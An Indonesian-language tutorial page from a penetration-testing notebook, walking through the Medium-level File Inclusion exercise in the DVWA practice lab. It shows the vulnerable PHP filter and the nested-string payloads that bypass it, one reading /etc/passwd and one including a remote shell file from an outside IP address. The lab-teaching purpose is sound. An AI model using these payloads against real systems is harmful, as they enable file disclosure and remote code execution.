📃
Anggi's Notes
  • Tentang Penulis
  • Preambule
  • Tutorial Red Team Area (General)
    • Tutorial Setup VirtualBox
    • Tutorial Setup Kali Linux pada VirtualBox
    • Network Adapter Type pada Virtual Box
    • Tutorial Port Forwarding Pada Virtual Box
    • Mempercepat update/upgrade/install Kali Linux
    • Networking in a Nutshell
    • Linux in A Nutshell
    • Linux Command Intro
    • VA-PT Cheatsheet
    • Penetration Testing Guide & Checklist
    • Pentesting Web checklist
    • NMAP Cheatsheet
    • Bind vs Reverse Shell Concept
    • Reverse Shell Cheatsheet
    • Linux TTY Shell Cheat Sheet
    • Menaikkan Common Shell ke Meterpreter
    • Metasploit Cheatsheet
      • msfvenom
      • searchploit
    • Metasploitable-2
    • Metasploitable-3
    • Linux Privilege Escalation
      • Linux Privilege Escalation with Misconfigured /etc/passwd
      • Linux Privilege Escalation with SUID
      • Linux Privilege Escalation with Misconfigured Sudo
      • Linux Privilege Escalation with MSF
    • DVWA
      • Brute Force
        • Low
        • Medium
        • High
      • Command Injection
        • Low
        • Medium
        • High
      • Local File Inclusion
        • Low
        • Medium
        • High
      • File Upload Vulnerability
        • Low
        • Medium
        • High
      • Cross Site Scripting (XSS)
        • Reflected
          • Low
          • Medium
          • High
        • Stored
          • Low
          • Medium
          • High
        • DOM
          • Low
          • Medium
          • High
      • SQL Injection
        • Non Blind
          • Low
          • Medium
          • High
        • Blind
          • Low
          • Medium
          • High
      • CSRF
        • Low
        • Medium
        • High
    • Pentesting Report Sample
    • Tutorial Penggunaan ZAP
    • Windows VA/Audit
      • DetExploit
      • HardeningKitty
      • Tutorial Installasi OWASP ZAP pada Windows OS
    • Linux VA/Audit dengan Lynis
    • Mobile Security Framework (MobSF) Windows Docker
  • Tutorial Red Team Area (Teknik Windows Attack )
    • Reconnaissance Techniques
    • Windows Red Team Exploitation Techniques
    • Windows Red Team Defense Evasion Techniques
  • Tutorial Blue Team Area
    • Merancang SOC
    • IR Playbook
    • Blue Team Opensource Online Tools
    • Wireshark Query Cheatsheet
  • Temuan Celah Keamanan
    • LFI (Directory Traversal) di redacted.co.id
    • Kredensial Database dan Azure Leaks pada redacted.com
    • HTML Injection di Tokopedia
    • 🤪4300$ Bounty from Opensource automate recon tools, why not?
    • I hacked Mastercard 4 times? But How?
    • LFI dan RCE di aset redacted.com
    • FTPd DOS di aset redacted.co.id
    • Gitlab SSRF di redacted.com
    • Firebase Android database Takeover
    • RCE di 11 Subdomain Dell
    • SSRF di redacted.com
    • Reflected XSS di CelticPipes
    • Git Disclosure di redacted.co.id
    • Open Redirection+XSS pada Private Program Bugcrowd
    • Rails Debug Mode Enabled pada redacted.com
Powered by GitBook
On this page
  • Mencari Informasi
  • Melakukan Serangan
  • Local File Inclusion
  • Remote File Inclusion

Was this helpful?

  1. Tutorial Red Team Area (General)
  2. DVWA
  3. Local File Inclusion

Medium

File Inclusion level Medium on DVWA

PreviousLowNextHigh

Last updated 3 years ago

Was this helpful?

Di bawah ini adalah source-code dari file inclusion level Medium di DVWA.

vulnerabilities/fi/source/medium.php
<?php
​
// The page we wish to display
$file = $_GET[ 'page' ];
​
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
​
?> 

Mencari Informasi

Kali ini jika kita kita menggunakan ../ atau ..\" untuk LFI dan http:// atau https:// untuk RFI, maka yang teks yang mengandung kata tersebut akan dihilangkan oleh fungsi .

Untuk mengatasi hal ini saya menemukan cara, yaitu menggunakan payload berikut:

..././ -> ../ #hasil setelah dihilangkan

dan

hthttp://tp://0.0.0.0/RFI-Shell.txt -> http://0.0.0.0/RFI-Shell.txt #hasil setelah dihilangkan

Bagaimana? Apakah anda mengerti? Perhatikan pada payload ..././, str_replace() akan menghilangkan karakter ../ sehingga hasilnya menjadi ../. Dan begitu juga yang RFI. Keren bukan? 😅

Atau kita juga bisa membuka file melalu direktori /, seperti /etc/passwd seperti berikut:

Kita sebagai peretas memang harus kreatif untuk mengatasi berbagai masalah.😉

Melakukan Serangan

Oke, pada kali ini sepertinya kita tetap bisa melakukan LFI maupun RCI.

Local File Inclusion

Di sini saya contohkan mengakses file /etc/passwd menggunakan cara "mundur direktori", sehingga payload yang bisa digunakan adalah seperti berikut:

?page=..././..././..././..././..././etc/passwd

Dan hasilnya berhasil!

Remote File Inclusion

Dari informasi yang telah kita kumpulkan, payload yang akan kita gunakan saat ini adalah seperti berikut:

?page=hthttp://tp://18.215.230.19/RFI-shell.txt

Dan hasilnya shell bisa dijalankan.

Selamat kawan! Happy Hacking! 🍻

str_replace()